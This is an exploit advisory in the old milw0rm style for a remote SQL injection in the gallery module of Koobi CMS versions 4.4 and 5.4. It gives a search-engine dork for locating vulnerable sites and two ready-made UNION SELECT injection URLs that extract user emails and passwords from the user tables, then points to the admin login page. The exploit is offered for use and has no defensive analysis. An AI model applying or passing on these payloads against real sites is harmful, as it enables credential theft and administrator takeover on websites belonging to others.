Koobi 4.4/5.4 gallery Remote SQL Injection Vulnerability

2008-04-08
ID: 29714
Download vulnerable application: None
##########################################
#
# Koobi v4.4,V5.4 gallery (img_id)
#
ONLY 4.4 AND 5.4

##########################################
#
##AUTHOR : [email protected]
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : [email protected]
#
###########################################
#
# DORK 1 : allinurl: "index.php?p=gallerypic img_id"

###########################################
EXPLOiT 1:

index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi4_user

EXPLOiT 2:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi_user



admin login=admin/login.php

password under page

###########################################
[email protected]#
###########################################
[email protected]#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
1-4-2 (www02)